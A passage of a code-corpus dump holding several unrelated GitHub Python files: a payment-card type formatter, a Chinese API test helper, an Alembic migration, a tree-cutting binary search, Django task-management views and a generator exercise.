formats.append('visa')\n if is_visa_electron(n):\n formats.append('visa electron')\n if is_mastercard(n):\n formats.append('mastercard')\n if is_amex(n):\n formats.append('amex')\n if is_maestro(n):\n formats.append('maestro')\n if is_discover(n):\n formats.append('discover')\n if is_rupay(n):\n formats.append('rupay')\n if is_hipercard(n):\n formats.append('hipercard')\n if is_dankort(n):\n formats.append('dankort')\n if is_instapayment(n):\n formats.append('instapayment')\n if is_laser(n):\n formats.append('laser')\n if is_bcmc(n):\n formats.append('bcmc')\n if is_jcb(n):\n formats.append('jcb')\n if is_unionpay(n):\n formats.append('unionpay')\n if is_solo(n):\n formats.append('solo')\n if is_dinersclub(n):\n formats.append('dinersclub')\n if is_cartebancaire(n):\n formats.append('cartebancaire')\n if is_elo(n):\n formats.append('elo')\n if is_vpay(n):\n formats.append('vpay')\n if is_switch(n):\n formats.append('switch')\n if is_carteblanche(n):\n formats.append('carteblanche')\n if is_bcglobal(n):\n formats.append('bcglobal')\n if is_koreancard(n):\n formats.append('koreancard')\n return formats\n\n\ndef strings_between(a, b):\n \"\"\"Generates a list of strings between a and b.\"\"\"\n return list(map(str, range(a, b)))\n","repo_name":"chetan92/CardValidator","sub_path":"CardValidator-master/cardvalidator/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":8817,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"9931105230","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/3/9 11:54\n# @Author : 潘师傅\n# @File : XfpApi.py\nimport requests\nimport json\nfrom GlobalMap import GlobalMap\nfrom Config.Config import *\nimport unittest\nimport time\nimport random\nimport datetime\nimport calendar\n\n\nclass appletApi:\n\n def __init__(self):\n self.appletText = GlobalMap()\n\n def RandomText(self, textArr):\n \"\"\"指定字符串随机取值\"\"\"\n # ['你好啊','阿米里!','扣你七娃','你好','hello']\n length = len(textArr)\n if length < 1:\n return ''\n if length == 1:\n return str(textArr[0])\n randomNumber = random.randint(0, length - 1)\n return str(textArr[randomNumber])\n\n def Merge(self, dict1, dict2):\n return (dict2.update(dict1))\n\n def PostRequest(self, url, data, header=None, Status=1, files=None, saasCode=XfpsaasCode):\n \"\"\"post请求\"\"\"\n if header is not None:\n r = requests.post(url=(ApiXfpUrl + url),\n data=json.dumps(data, ensure_ascii=False),\n headers={\n 'Content-Type': 'application/json'\n\n })\n else:\n data1 = {\"page\": {\n 'size': '100',\n 'current': '1'\n },\n \"saasCode\": saasCode,\n \"saasCodeSys\": saasCode\n }\n self.Merge(data1, data)\n time.sleep(0.2)\n r = requests.post(url=(ApiXfpUrl + url),\n data=(json.dumps(data,\n ensure_ascii=False).encode(\"UTF-8\")),\n headers={\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer' + ' ' + self.appletText.get(\"user_token\")\n },\n files=files)\n r.raise_for_status()\n self.appletText.set_map('URL', ApiXfpUrl + url)\n globals()['XfpText'] = globals()['r.text'] = json.loads(r.text)\n self.appletText.set_map('XfpText', globals()['r.text'])\n self.appletText.set_map('ApiXfpUrl', url)\n self.appletText.set_map('msg', globals()['XfpText']['msg'])\n self.appletText.set_map('code', globals()['XfpText']['code'])\n self.appletText.set_map('data', globals()['XfpText']['data'])\n time.sleep(0.2)\n if Status == 1:\n try:\n assert \"成功\", globals()['r.text']['msg']\n except BaseException as e:\n print(\"断言错误,错误原因:%s\" % e)\n raise RuntimeError(self.appletText.get('URL'))\n if globals()['r.text']['code'] == 500:\n raise RuntimeError(self.appletText.get('ApiXfpUrl'))\n\n if r.elapsed.total_seconds() > 5:\n print('接口请求过慢')\n print(self.appletText.get('ApiXfpUrl'))\n if r.elapsed.total_seconds() > 10:\n print('接口请求过慢大于10秒')\n print(self.appletText.get('ApiXfpUrl'))\n\n def sendCodeWeiXin(self, userName='19859080323'):\n \"\"\"获取验证码\"\"\"\n self.PostRequest(url='/api/auth/sendCodeWeiXin',\n data={\n 'senderSource': '微信小程序',\n 'senderDevice': 'ces',\n 'userName': userName\n })\n\n def Login(self, userName=XfpUser, code='12345678'):\n \"\"\"登录\"\"\"\n self.PostRequest(url='/api/auth/loginByCodeWeiXin',\n data={\n \"senderSource\": \"微信小程序\",\n # \"senderDevice\": \"ces\",\n \"userName\": userName,\n \"code\": code})\n if self.appletText.get('msg') == '成功':\n if (globals()['XfpText']['data']['userDetail']) is not 'None':\n self.appletText.set_map('user_token', globals()['XfpText']['data']['token'])\n\n def LogIn(self, userName=XfpUser, password=XfpPwd, saasCode=XfpsaasCode, authCode=None, device=None):\n \"\"\"登录\"\"\"\n if device is None:\n device = deviceId\n if authCode is None:\n self.PostRequest(url='/api/auth/login',\n data={\"userName\": userName,\n 'saasCode': saasCode,\n 'deviceId': device,\n # 'deviceId': deviceId,\n \"password\": password},\n header=1)\n else:\n self.PostRequest(url='/api/auth/login',\n data={\"userName\": userName,\n 'saasCode': saasCode,\n 'authCode': authCode,\n \"password\": password},\n header=1)\n\n if self.appletText.get('msg') == '成功':\n if (globals()['XfpText']['data']['userDetail']) is not 'None':\n if authCode is None:\n self.appletText.set_map('user_token', globals()['XfpText']['data']['token'])\n\n else:\n self.appletText.set_map('user_token', globals()['XfpText']['data']['token'])\n try:\n self.appletText.set_map('resultStr', globals()['r.text']['data']['resultStr'])\n except:\n pass\n\n else:\n self.appletText.set_map('userId', globals()['XfpText']['data']['userDetail']['id'])\n\n else:\n self.appletText.set_map('data', globals()['XfpText']['data'])\n\n\nif __name__ == '__main__':\n a = appletApi()\n\n\n","repo_name":"yebenxiaozhang/Projects_xfj","sub_path":"XFP/PubilcAPI/appletApi.py","file_name":"appletApi.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24481982341","text":"\"\"\"empty message\n\nRevision ID: 102d609bce75\nRevises: 12c9567eaed5\nCreate Date: 2015-01-25 22:28:39.076329\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '102d609bce75'\ndown_revision = '12c9567eaed5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('wufoo_textarea_sentiment', sa.Column('survey_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'wufoo_textarea_sentiment', 'wufoo_survey', ['survey_id'], ['id'])\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'wufoo_textarea_sentiment', type_='foreignkey')\n op.drop_column('wufoo_textarea_sentiment', 'survey_id')\n ### end Alembic commands ###\n","repo_name":"wigginslab/lean-workbench","sub_path":"migrations/versions/102d609bce75_.py","file_name":"102d609bce75_.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"}
+{"seq_id":"9878348943","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\ntrees = list(map(int, sys.stdin.readline().split()))\n\nstart, end = 1, max(trees)\n\ndef get_woods(meter):\n woods = 0\n for tree in trees:\n woods += tree - meter if tree > meter else 0\n return woods\n\nwhile start <= end:\n mid = (start + end) // 2\n woods = get_woods(mid)\n \n if woods >= m:\n start = mid + 1\n else:\n end = mid - 1\n\nprint(end)","repo_name":"mchu7797/coding-tests-algorithm","sub_path":"2805.py","file_name":"2805.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24453659340","text":"import json\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib import messages\nfrom django.http import JsonResponse\nfrom datetime import datetime\nfrom .models import Task, Assignment\nfrom .forms import Task_creation_form\nfrom company.models import Company,Notification\n\n\n@login_required(login_url='account:login')\ndef get_task_info_based_on_status(request, status):\n user = request.user\n status = status\n task_query = Task.objects.filter(assignee=user, status=status)\n\n task_list = []\n for t in task_query:\n task = {\n 'finishing_expected': t.finishing_expected.strftime(\"%b %d, %Y, %I:%M %p\"),\n 'title':t.title,\n 'task_id':t.id,\n 'priority':t.priority,\n 'company':t.company.name,\n 'company_id':t.company.id\n }\n task_list.append(task)\n\n return JsonResponse({'data':task_list}, safe=False)\n\n\n@login_required(login_url='account:login')\ndef get_task_info_for_task_modal(request, id):\n task = Task.objects.get(pk=id)\n\n assignee_list = []\n for a in task.assignee.all():\n assignee = {\n 'assignee_id':a.id,\n 'assignee_name':a.username,\n 'assignee_img_url':a.profile_picture.url,\n }\n assignee_list.append(assignee)\n\n if task.finishing_date:\n finishing_date = task.finishing_date.strftime(\"%b %d, %Y, %I:%M %p\"),\n else:\n finishing_date = None,\n\n data = [{\n 'title':task.title,\n 'status':task.status,\n 'drescription':task.drescription,\n 'priority':task.priority,\n 'checklist':task.checklist,\n 'company':task.company.name,\n 'company_id':task.company.id,\n 'company_logo_url':task.company.company_logo.url,\n 'assignees':assignee_list,\n 'finishing_expected':task.finishing_expected.strftime(\"%b %d, %Y, %I:%M %p\"),\n 'date_created':task.date_created.strftime(\"%b %d, %Y, %I:%M %p\"),\n 'finishing_date':finishing_date,\n },]\n return JsonResponse({'data':data}, safe=False )\n\n# cancelling their implementation to shortend dev time,\n# use if to check null or not, then use below code, or response won't be ok\n# 'last_updated':task.last_updated.strftime(\"%b %d, %Y, %I:%M %p\"),\n# 'finishing_date':task.finishing_date.strftime(\"%b %d, %Y, %I:%M %p\"),\n\ndef user_workspace(request):\n tasks = Task.objects.filter(assignee=request.user, status='ongoing')\n context = {\n 'tasks':tasks,\n }\n return render(request, 'task/user-workspace.html', context)\n\n\n@login_required(login_url='account:login')\ndef show_company_list(request):\n user = request.user\n companies = Company.objects.filter(members=user)\n users_companies = Company.objects.filter(creator=user)\n\n context = {\n 'companies':companies,\n 'user_companies':users_companies,\n }\n return render(request, 'task/show-company-list.html', context)\n\n\n@login_required(login_url='account:login')\ndef create_task(request, c_id):\n company_id = c_id\n form = Task_creation_form(user_id=request.user.id, company_id=company_id)\n\n if request.method == 'POST':\n form = Task_creation_form(user_id=request.user.id,company_id=company_id,data=request.POST)\n if form.is_valid():\n task = form.save(commit=False)\n task.creator = request.user\n\n if task.status == 'finished':\n task.finishing_date = datetime.today()\n\n task.save()\n\n company = form.cleaned_data['company']\n for user in form.cleaned_data['assignee']:\n Assignment.objects.create(user=user, task=task)\n title = 'Task Assignment'\n subject = f\"{company.name} assigned you new Task.\"\n notification = Notification.objects.create(\n type = \"assignment\",\n title = title,\n subject = subject,\n company_sender = company,\n )\n notification.receivers.set([user])\n\n messages.success(request, 'Task Created Successfully')\n return redirect('task:user-workspace')\n\n context = {\n 'form':form\n }\n return render(request, 'task/create-task-form.html', context)\n\n\n@login_required(login_url='account:login')\ndef edit_task(request, id):\n task = Task.objects.get(pk=id)\n user_id = request.user.id\n company_id =task.company.id\n form = Task_creation_form(user_id=user_id,company_id=company_id,instance=task)\n\n if request.method == \"POST\":\n form = Task_creation_form(user_id=user_id,company_id=company_id,data=request.POST, instance=task)\n\n if form.is_valid():\n task = form.save(commit=False)\n\n if task.status == 'finished':\n task.finishing_date = datetime.today()\n\n task.save()\n company = form.cleaned_data['company']\n for user in form.cleaned_data['assignee']:\n try:\n assignment = Assignment.objects.get(user=user, task=task)\n except:\n assignment = None\n\n if assignment is None:\n Assignment.objects.create(user=user, task=task)\n title = 'Task Assignment'\n subject = f\"{company.name} assigned you new Task.\"\n notification = Notification.objects.create(\n type = \"assignment\",\n title = title,\n subject = subject,\n company_sender = company,\n )\n notification.receivers.set([user])\n\n messages.success(request, 'Task Updated')\n return redirect('task:user-workspace')\n\n context = {\n 'form':form,\n }\n return render(request, 'task/create-task-form.html', context)\n\n\n@login_required(login_url='account:login')\ndef delete_task(request, id):\n task = Task.objects.get(pk=id)\n\n context = {\n 'task':task,\n }\n return render(request, 'task/delete-task.html', context)\n\n@login_required(login_url='account:login')\ndef confirm_delete_task(request, id):\n task= Task.objects.get(pk=id)\n task.delete()\n messages.warning(request, 'Task deleted')\n return redirect(request.GET['next'] if 'next' in request.GET else 'task:user-workspace')\n\n\n","repo_name":"Yasir-GitAc/task-management","sub_path":"task/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"32151320389","text":"def zakres(pierwszy=0, ostatni=100, krok=1):\n liczba = pierwszy\n while liczba < ostatni:\n yield liczba\n liczba += krok\n\nzakres1 = zakres(1,50)\n#zakres2 = zakres(1,50)\n\nfor a in zakres1:\n print(a)\n\nfor b in zakres1:\n print(b)","repo_name":"marcingastol/WSB_Python_2022-23_GR3","sub_path":"T3/Niedziela/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"pl","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}